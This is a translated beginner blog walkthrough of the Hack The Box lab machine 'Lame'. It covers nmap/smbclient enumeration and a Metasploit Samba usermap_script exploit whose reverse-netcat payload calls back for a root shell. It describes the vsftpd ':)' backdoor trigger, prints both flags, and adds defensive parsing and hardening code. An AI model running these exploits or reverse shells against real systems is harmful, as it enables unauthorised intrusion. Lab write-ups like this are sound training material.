iT邦幫忙

2024 iThome Ironman Contest

DAY 28
Self-Challenge Group

From Zero: Introduction to Security Penetration Testing series, part 28

24: Introduction to Security Penetration Testing: HTB Beginner Machines: Lame (Linux)
Today we continue with an easy target machine.

https://app.hackthebox.com/machines/Lame
Machine introduction:
Lame is an easy Linux machine that requires only one exploit to obtain root access. It was the first machine published on Hack The Box and, before its retirement, was often the first machine new users attempted.

Task 1: How many of the nmap top 1000 TCP ports are open on the remote host?

```bash
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV 10.10.10.3       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 04:21 EDT
Nmap scan report for 10.10.10.3
Host is up (0.28s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds
```

Task 2: What version of VSFTPd is running on Lame?

The same nmap scan from Task 1 already answers this: the FTP banner reports `vsftpd 2.3.4`.

Task 3: There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

```bash
msfconsole

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                       g-metasploit.html
   RPORT    21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```

Task 4: What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".

```bash
┌──(kali㉿kali)-[~]
└─$ smbclient -L //10.10.10.3 -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
```
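
Tasks 1, 2 and 4 are all answered by reading version strings out of tool output, which is also what a defender's exposure inventory does. As an added example (not code from the original post), the following Python parses the nmap and smbclient output shown above, counts the open TCP ports, extracts the vsftpd and Samba versions, and flags the two fingerprints this post later ties to CVEs. The sample strings are copied from the scans above and embedded so it runs offline; the `KNOWN_VULNERABLE` table is an assumption built only from versions and CVE numbers that appear in this post.

```python
import re
from typing import List, NamedTuple, Optional

# Sample input: the nmap -sV lines from the Task 1 scan above, embedded so the example runs offline.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.3
Host is up (0.28s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# Sample input: the share listing from the Task 4 smbclient run above.
SMBCLIENT_OUTPUT = """\
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
"""


class PortInfo(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# One nmap port line: "21/tcp  open  ftp         vsftpd 2.3.4"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# smbclient reports the exact Samba version inside the IPC$ comment.
SAMBA_VERSION = re.compile(r"Samba (\d+\.\d+\.\d+)")

# Fingerprints tied to CVEs elsewhere in this post (assumed lookup table for the example).
KNOWN_VULNERABLE = {
    ("ftp", "vsftpd 2.3.4"): "CVE-2011-2523 (vsftpd 2.3.4 backdoor)",
    ("samba", "3.0.20"): "CVE-2007-2447 (Samba username map script)",
}


def parse_nmap(text: str) -> List[PortInfo]:
    """Extract the per-port rows from nmap's normal (human-readable) output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append(PortInfo(int(m.group(1)), m.group(2), m.group(3),
                                  m.group(4), m.group(5).strip()))
    return ports


def open_tcp_ports(ports: List[PortInfo]) -> List[int]:
    """Task 1: the open TCP ports seen from outside."""
    return [p.port for p in ports if p.proto == "tcp" and p.state == "open"]


def service_version(ports: List[PortInfo], service: str) -> Optional[str]:
    """Task 2: the version string nmap reported for a named service."""
    for p in ports:
        if p.service == service:
            return p.version
    return None


def samba_version_from_smbclient(text: str) -> Optional[str]:
    """Task 4: the Samba version up to but not including '-Debian'."""
    m = SAMBA_VERSION.search(text)
    return m.group(1) if m else None


def assess(ports: List[PortInfo], samba_version: Optional[str]) -> List[str]:
    """Match observed fingerprints against the known-vulnerable table."""
    findings = []
    for p in ports:
        cve = KNOWN_VULNERABLE.get((p.service, p.version))
        if cve:
            findings.append(f"{p.port}/{p.proto}: {cve}")
    if samba_version and ("samba", samba_version) in KNOWN_VULNERABLE:
        findings.append(f"smb: Samba {samba_version}: {KNOWN_VULNERABLE[('samba', samba_version)]}")
    return findings


if __name__ == "__main__":
    scanned = parse_nmap(NMAP_OUTPUT)
    print("open tcp ports:", open_tcp_ports(scanned))
    print("ftp version:", service_version(scanned, "ftp"))
    print("samba version:", samba_version_from_smbclient(SMBCLIENT_OUTPUT))
    for finding in assess(scanned, samba_version_from_smbclient(SMBCLIENT_OUTPUT)):
        print("finding:", finding)
```

Parsing the exact version out of the smbclient comment matters because nmap's probe only narrows Samba to `3.X - 4.X`; a version-based vulnerability match needs the precise string, which is why Task 4 asks for it.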

- ChatGPT: Try `smbclient`, `enum4linux`, or Metasploit's `smb_version` module to confirm the exact Samba version

    To confirm the exact version of `Samba`, you can use the following methods to obtain more detailed information.

    ### 1. **Using `smbclient`**:

    - `smbclient` is a command-line tool for accessing SMB shares. You can use it to try to obtain the exact Samba version.

    ### Steps:

    1. Open a terminal and run the following command to connect to the target's shares:

        ```bash
        smbclient -L //10.10.10.3 -N
        ```

        - `-L` lists all shares.
        - `-N` means no password is needed.
    2. In the `smbclient` output, look for information about the exact Samba version.

    ### 2. **Using `enum4linux`**:

    - `enum4linux` is a tool built specifically to enumerate and collect information about Windows and Samba systems; it can help you determine the Samba version.

    ### Steps:

    1. Run the following command to scan the target:

        ```bash
        enum4linux -a 10.10.10.3
        ```

    2. Look through the output for the Samba-related section, which usually shows a more specific version.

    ### 3. **Using a Metasploit module**:

    - Metasploit has an auxiliary module dedicated to enumerating the Samba version.

    ### Steps:

    1. Start Metasploit with `msfconsole`:

        ```bash
        msfconsole
        ```

    2. Use the `auxiliary/scanner/smb/smb_version` module to get the Samba version:

        ```bash
        use auxiliary/scanner/smb/smb_version
        set RHOSTS 10.10.10.3
        run
        ```

    3. The output of this module should give the specific Samba version number.

    ### Summary:

    - Try `smbclient`, `enum4linux`, or Metasploit's `smb_version` module to confirm the exact Samba version.
    - In the output of these tools you should find more detailed version information, which answers the question.

    If you run into any problems along the way or need more help, just let me know!

Task 5: What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?

- Search for the vulnerability with Metasploit
    
    ```bash
    msf6 > search samba
    
    Matching Modules
    ================
    
       #   Name                                                         Disclosure Date  Rank       Check  Description
       -   ----                                                         ---------------  ----       -----  -----------
       ...
       ...
       15  exploit/multi/samba/usermap_script                           2007-05-14       excellent  No     Samba "username map script" Command Execution
    ```
    
- View the module details
    
    ```bash
    msf6 exploit(multi/samba/usermap_script) > show info 
    
           Name: Samba "username map script" Command Execution
         Module: exploit/multi/samba/usermap_script
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2007-05-14
    
    Provided by:
      jduck <jduck@metasploit.com>
    
    Available targets:
          Id  Name
          --  ----
      =>  0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                         metasploit.html
      RPORT   139              yes       The target port (TCP)
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits a command execution vulnerability in Samba
      versions 3.0.20 through 3.0.25rc3 when using the non-default
      "username map script" configuration option. By specifying a username
      containing shell meta characters, attackers can execute arbitrary
      commands.
    
      No authentication is needed to exploit this vulnerability since
      this option is used to map usernames prior to authentication!
    
    References:
      https://nvd.nist.gov/vuln/detail/CVE-2007-2447
      OSVDB (34700)
      http://www.securityfocus.com/bid/23972
      http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
      http://samba.org/samba/security/CVE-2007-2447.html
    
    View the full module info with the info -d command.
    ```
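
The module description above states the root cause of CVE-2007-2447: a username containing shell metacharacters reaches a shell through the "username map script" option, before authentication. As an added example (not code from the original post, from Samba, or from the Metasploit module), the following Python shows the vulnerable shape beside its hardened form: the unsafe function only builds the string a shell would have parsed (it never executes it), while the safe path validates the name against an allowlist and passes it as a single argv element with no shell involved. The script path `/etc/samba/map.sh` is a hypothetical placeholder, and the allowlist pattern is an assumption to adapt to a real naming policy.

```python
import re
import shutil
import subprocess
from typing import List

# Allowlist for account names (assumption for this example: POSIX-style names,
# lowercase, at most 32 characters). Prefer an allowlist over stripping "bad" characters.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")

# Characters that change the structure of a command line when /bin/sh -c parses it.
SHELL_META = set(";&|`$()<>{}[]*?!~'\"\\ \t\n")

# Harmless program used as the stand-in "map script" so the safe path can actually run.
ECHO = shutil.which("echo") or "/bin/echo"


def has_shell_metachar(name: str) -> bool:
    """True if the name contains anything a shell would interpret."""
    return any(ch in SHELL_META for ch in name)


def is_safe_username(name: str) -> bool:
    """Allowlist check: only names matching USERNAME_RE are accepted."""
    return bool(USERNAME_RE.match(name))


def unsafe_shell_command(script: str, name: str) -> str:
    """The vulnerable shape: the raw username is interpolated into a command line
    that a shell then parses, so metacharacters in `name` become shell syntax.
    Returned as a string for inspection only; this example never executes it."""
    return f"{script} {name}"


def safe_argv(script: str, name: str) -> List[str]:
    """Hardened form: reject anything outside the allowlist, then build an argv
    list so the name is delivered as one argument and no shell is involved."""
    if not is_safe_username(name):
        raise ValueError(f"username rejected by allowlist: {name!r}")
    return [script, name]


def run_username_map(script: str, name: str) -> str:
    """Run the map script with shell=False (the default for a list argv)."""
    argv = safe_argv(script, name)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return proc.stdout.strip()


if __name__ == "__main__":
    for candidate in ("makis", "makis;echo injected"):
        print(f"{candidate!r}: allowlist ok={is_safe_username(candidate)}, "
              f"metachars={has_shell_metachar(candidate)}")
        print("  shell would have parsed:", unsafe_shell_command("/etc/samba/map.sh", candidate))
    print("safe run:", run_username_map(ECHO, "makis"))
```

The validation step is the part that survives a change of execution mechanism: even with argv lists, a map script that itself re-invokes a shell on its argument would reintroduce the problem, so rejecting metacharacters at the boundary is the durable control.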
    

Task 6: Exploiting CVE-2007-2447 returns a shell as which user?

- Exploit the vulnerability
    
    ```bash
    msf6 exploit(multi/samba/usermap_script) > show options 
    
    Module options (exploit/multi/samba/usermap_script):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                          -metasploit.html
       RPORT   139              yes       The target port (TCP)
    
    Payload options (cmd/unix/reverse_netcat):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.242.130  yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    View the full module info with the info, or info -d command.
    
    msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
    RHOSTS => 10.10.10.3
    msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.16.2
    LHOST => 10.10.16.2
    msf6 exploit(multi/samba/usermap_script) > run
    
    [*] Started reverse TCP handler on 10.10.16.2:4444 
    [*] Command shell session 1 opened (10.10.16.2:4444 -> 10.10.10.3:52012) at 2024-08-25 04:45:51 -0400
    
    whoami
    root
    ```
    

Task 7: Submit the flag located in the makis user's home directory.

- Go to the specified location and read the flag
    
    ```bash
    cd /home/makis
    ls
    user.txt
    cat user.txt
    383601fde3549ac80a5189cebcc5e0a3
    ```
    

Task 8: Submit the flag located in root's home directory.

- Go to the specified location and read the flag
    
    ```bash
    cd ~
    pwd
    /root
    ls -al
    total 80
    drwxr-xr-x 13 root root 4096 Aug 25 04:21 .
    drwxr-xr-x 21 root root 4096 Oct 31  2020 ..
    -rw-------  1 root root  373 Aug 25 04:21 .Xauthority
    lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
    -rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
    drwx------  3 root root 4096 May 20  2012 .config
    drwx------  2 root root 4096 May 20  2012 .filezilla
    drwxr-xr-x  5 root root 4096 Aug 25 04:21 .fluxbox
    drwx------  2 root root 4096 May 20  2012 .gconf
    drwx------  2 root root 4096 May 20  2012 .gconfd
    drwxr-xr-x  2 root root 4096 May 20  2012 .gstreamer-0.10
    drwx------  4 root root 4096 May 20  2012 .mozilla
    -rw-r--r--  1 root root  141 Oct 20  2007 .profile
    drwx------  5 root root 4096 May 20  2012 .purple
    -rwx------  1 root root    4 May 20  2012 .rhosts
    drwxr-xr-x  2 root root 4096 May 20  2012 .ssh
    drwx------  2 root root 4096 Aug 25 04:21 .vnc
    drwxr-xr-x  2 root root 4096 May 20  2012 Desktop
    -rwx------  1 root root  401 May 20  2012 reset_logs.sh
    -rw-------  1 root root   33 Aug 25 04:21 root.txt
    -rw-r--r--  1 root root  118 Aug 25 04:21 vnc.log
    cat root.txt
    a88eab69f724aceb3b0e1cbb5fbddb46
    ```
    

Task 9: We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running `netstat -tnlp` shows many more ports listening, including ones on 0.0.0.0 and the box's external IP, so they should be accessible. What must be blocking connection to these ports?

ChatGPT:
To answer this question, you need to understand how network ports work and what could block external connections. The question says that `netstat -tnlp` shows many listening ports, yet these ports cannot be reached from outside, which means some network protection mechanism is blocking those connections.

### 1. **Use `netstat -tnlp` to view the listening ports**:

- The `netstat -tnlp` command shows all TCP ports listening on the target, and these ports should be open to external connections on the target.
- If you are in the shell, you can run the following command to view these ports:

    ```bash
    netstat -tnlp
    ```

- This lists all listening ports and the programs bound to them.

### 2. **Consider possible blocking mechanisms**:

- Even if a port is listening locally and should in theory be open externally, there are several reasons external connections to it may be blocked. These include:
    - **Firewall**: the target may be running a firewall configured with rules that block external connections to these ports even though they are listening locally.
    - **TCP Wrappers**: some systems use TCP Wrappers to restrict which IP addresses may access which services. This is usually configured in `/etc/hosts.allow` and `/etc/hosts.deny`.
    - **External firewall or network configuration**: if the target sits in a network protected by a firewall, that network may block external access to these ports.

### 3. **Conclusion and answer**:

- The answer is most likely that a `firewall` or `TCP Wrappers` is blocking external connections to these ports.
- The specific answer should be:

    ```
    Firewall or TCP Wrappers
    ```

This means that even though these ports are listening locally, a firewall or TCP Wrappers may be restricting external access.

### Summary:

- Use `netstat -tnlp` to view all listening ports on the target.
- Consider that a firewall or TCP Wrappers may be blocking external access to these ports.
- When submitting the answer, you can answer `Firewall or TCP Wrappers`.

If you have more questions or need further help, just let me know!
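
Task 9 turns on the difference between a socket that is listening and a port that is reachable from outside, and the same comparison is a useful host-hardening check: a listener bound to an external address that an external scan never sees is either intentionally filtered or unexpectedly exposed once the filter changes. As an added example (not from the original post or from 0xdf's write-up), the following Python parses a `netstat -tnlp` listing, compares it with the open ports the external nmap scan found, and separates listeners into reachable, filtered, and loopback-only. The netstat text is a constructed sample, not the real listing from Lame (the post does not reproduce it); the port 6200 entry stands in for the vsftpd backdoor listener discussed in Tasks 10 and 11, and the `KNOWN_BACKDOOR_PORTS` table is an assumption limited to that one port from this post.

```python
import re
from typing import Dict, List, NamedTuple, Set

# Constructed sample netstat -tnlp output (not Lame's real listing).
NETSTAT_SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      4356/vsftpd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      4408/sshd
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      4474/smbd
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      4474/smbd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      4520/mysqld
tcp        0      0 10.10.10.3:6200         0.0.0.0:*               LISTEN      4356/vsftpd
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      4600/Xvnc
"""

# Open TCP ports reported by the external nmap scan in Task 1.
EXTERNAL_OPEN = {21, 22, 139, 445}
# Addresses of the host's own external interfaces (from the scan target above).
HOST_IPS = {"10.10.10.3"}
# Listener ports that indicate a known backdoor rather than a service (from Task 10).
KNOWN_BACKDOOR_PORTS = {6200: "vsftpd 2.3.4 backdoor listener (CVE-2011-2523)"}


class Listener(NamedTuple):
    addr: str
    port: int
    program: str


# One netstat LISTEN row: proto, queues, local addr:port, foreign, state, pid/program.
NETSTAT_LINE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN\s+(?P<prog>\S+)"
)


def parse_netstat(text: str) -> List[Listener]:
    """Extract listening TCP sockets from netstat -tnlp output."""
    found = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            found.append(Listener(m["addr"], int(m["port"]), m["prog"]))
    return found


def is_external_bind(addr: str, host_ips: Set[str]) -> bool:
    """A wildcard or interface address is reachable from the network; loopback is not."""
    return addr in {"0.0.0.0", "::", "*"} or addr in host_ips


def classify(listeners: List[Listener], external_open: Set[int],
             host_ips: Set[str]) -> Dict[str, Set[int]]:
    """Split listeners by what an external scanner could see.
    'filtered' is the Task 9 case: bound externally, but never answered from outside."""
    result: Dict[str, Set[int]] = {"reachable": set(), "filtered": set(), "local_only": set()}
    for lst in listeners:
        if not is_external_bind(lst.addr, host_ips):
            result["local_only"].add(lst.port)
        elif lst.port in external_open:
            result["reachable"].add(lst.port)
        else:
            result["filtered"].add(lst.port)
    return result


def backdoor_hits(ports: Set[int]) -> Dict[int, str]:
    """Ports in the set that match a known backdoor listener."""
    return {p: KNOWN_BACKDOOR_PORTS[p] for p in ports if p in KNOWN_BACKDOOR_PORTS}


if __name__ == "__main__":
    listeners = parse_netstat(NETSTAT_SAMPLE)
    report = classify(listeners, EXTERNAL_OPEN, HOST_IPS)
    for bucket, ports in report.items():
        print(f"{bucket}: {sorted(ports)}")
    for port, why in backdoor_hits(report["filtered"] | report["reachable"]).items():
        print(f"indicator on port {port}: {why}")
```

A non-empty `filtered` set is exactly what the question describes: sockets that `netstat` shows bound to `0.0.0.0` or the external IP, yet absent from the outside-in scan, so the blocking must sit between the two views (a host firewall, or TCP Wrappers for wrapped services). From a defender's side, anything in that set that is not a deliberate firewall policy is worth an explanation, and a hit from `backdoor_hits` is worth an incident ticket.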

Task 10: When the VSFTPd backdoor is triggered, what port starts listening?

When the `VSFTPd` backdoor is triggered, it starts listening on **TCP port 6200**.

This is because `VSFTPd` version 2.3.4 contains a known backdoor (CVE-2011-2523): when the supplied username contains the special string `:)`, the backdoor is triggered and opens a shell on port `6200`, allowing an attacker to execute commands remotely.

Task 11: When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?

- **Answer: YES.** When the `VSFTPd` backdoor is triggered, port `6200` starts listening.
